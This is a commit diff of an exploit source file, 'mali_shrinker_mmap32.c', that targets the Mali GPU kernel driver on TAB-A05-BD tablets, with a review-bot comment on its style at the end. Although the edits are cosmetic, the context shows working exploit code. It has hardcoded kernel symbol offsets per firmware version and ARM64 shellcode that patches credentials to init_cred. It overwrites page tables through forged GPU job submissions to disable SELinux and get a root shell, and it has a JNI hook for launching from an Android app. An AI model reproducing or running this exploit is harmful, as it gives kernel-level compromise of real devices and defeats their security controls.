Align mali_shrinker_mmap32.c
Signed-off-by: Syuugo <[email protected]>
s1204IT authored May 27, 2024
1 parent 6ca5647 commit 28b26ca
Showing 1 changed file with 15 additions and 29 deletions.
44 changes: 15 additions & 29 deletions mali_shrinker_mmap32.c
Expand Up @@ -63,6 +63,7 @@
#define ADD_COMMIT_INDEX 3

/*
Need: kallsyms
KERNEL_BASE = do_undefinstr - 0x1000
COMMIT_CREDS = commit_creds - KERNEL_BASE
AVC_DENY= avc_denied.isra.4 - KERNEL_BASE
Expand All @@ -80,19 +81,19 @@ ADD_COMMIT = add x8, x8, #0x(Last 3 digits of INIT_CRED)
ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED)
*/

/*
* Maintained by Syuugo
*/

// TAB-A05-BD 01.00.000
#define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc
#define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80 // 0xffffff80083e5d80 - 0xffffff8008080000 = 0x365d80
#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8 // 0xffffff80083e53a8 - 0xffffff8008080000 = 0x3653A8 //add
#define INIT_CRED_CTX_01_00_000 0x11553f0 // 0xffffff80091d53f0 - 0xffffff8008080000 = 0x11553F0
#define COMMIT_CREDS_CTX_01_00_000 0x5a120 // 0xffffff80080da120 - 0xffffff8008080000 = 0x5a120
#define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80
#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8
#define INIT_CRED_CTX_01_00_000 0x11553f0
#define COMMIT_CREDS_CTX_01_00_000 0x5a120
#define ADD_INIT_CTX_01_00_000 0x910fc000
#define ADD_COMMIT_CTX_01_00_000 0x91048108
#define AVC_DENY_CTX_01_00_000 0x35acc8 // 0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8 //add

/*
* Maintained by Syuugo
*/
#define AVC_DENY_CTX_01_00_000 0x35acc8

// TAB-A05-BD 01.01.001
#define COMMIT_CREDS_CTX_01_01_001 0x5a120
Expand Down Expand Up @@ -551,7 +552,6 @@ uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) {
}

void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) {

uint32_t init_adpr = write_adrp(0, read_enforce, init_cred);
// Sets x0 to init_cred
root_code[ADRP_INIT_INDEX] = init_adpr;
Expand Down Expand Up @@ -580,7 +580,6 @@ void fixup_root_shell_nop() {
}

void fixup_root_shell_un(uint64_t init_cred, uint64_t commit_cred, uint64_t read_handle_unknown, uint32_t add_init, uint32_t add_commit) {

uint32_t init_adpr = write_adrp(0, read_handle_unknown, init_cred);
// Sets x0 to init_cred
root_code_un[ADRP_INIT_INDEX] = init_adpr;
Expand All @@ -594,7 +593,6 @@ void fixup_root_shell_un(uint64_t init_cred, uint64_t commit_cred, uint64_t read
root_code_un[7] = 0xd65f03c0; // ret
}


uint64_t set_addr_lv3(uint64_t addr) {
uint64_t pfn = addr >> PAGE_SHIFT;
pfn &= ~ 0x1FFUL;
Expand Down Expand Up @@ -637,7 +635,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e
if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) {
err(1, "submit job failed\n");
}
usleep(500000);
usleep(300000);
}

void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, uint64_t value, enum mali_write_value_type type) {
Expand Down Expand Up @@ -697,7 +695,7 @@ int run_enforce() {
return result;
}


/*
int run_enforce_write() {
char result = '0';
sleep(3);
Expand All @@ -710,6 +708,7 @@ int run_enforce_write() {
LOG("result %d\n", result);
return result;
}
*/

int run_enforce_un() {
char result = '2';
Expand Down Expand Up @@ -795,19 +794,6 @@ void select_offset() {
return;
}

/*
if (1) {
//avc_deny = 0x321C64; // avc_denied.isra.6
//selinux_enforcing_READ = 0x32CC2C ; // t sel_read_enforce
//selinux_enforcing_WRITE = 0x32E01C ; // t sel_read_enforce
selinux_enforcing = SELINUX_ENFORCING_neo;
sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_neo;
//fixup_root_shell(0x12253F0, 0x5B328, selinux_enforcing_WRITE, 0x910FC000, 0x910CA108);
//fixup_root_shell(0x12253F0, 0x5B328, selinux_enforcing_READ, 0x910FC000, 0x910CA108);
fixup_root_shell_un(INIT_CRED_neo, COMMIT_CREDS_neo, sel_read_handle_unknown, ADD_INIT_neo, ADD_COMMIT_neo);
return;
}
*/
err(1, "unable to match build id\n");
}

Expand All @@ -825,7 +811,7 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved)
}

void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
/*
/*
uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
Expand Down Expand Up @@ -972,7 +958,7 @@ int main() {
#else
#include <jni.h>
JNIEXPORT int JNICALL
Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thiz)
Java_com_example_hellojni_MaliExpService_stringFromJNI(JNIEnv* env, jobject thiz)
{
setbuf(stdout, NULL);
setbuf(stderr, NULL);
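Review bot: The `/*` and `*/` lines added around `run_enforce_write()` (the hunks at -697 and -710) leave a whole function behind as commented-out dead code, in the same commit that deletes the commented-out `if (1)` block from `select_offset()`. Either delete the function outright or fence it with `#if 0` / `#endif`. A block comment ends at the first `*/` inside it, and part of the function body lies between the two hunks and is not visible here, so an inner comment cannot be ruled out. Separately, the commit title says "Align", but the `write_to()` hunk changes `usleep(500000)` to `usleep(300000)`, a behavioural change that should be stated in the commit message or split into its own commit.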
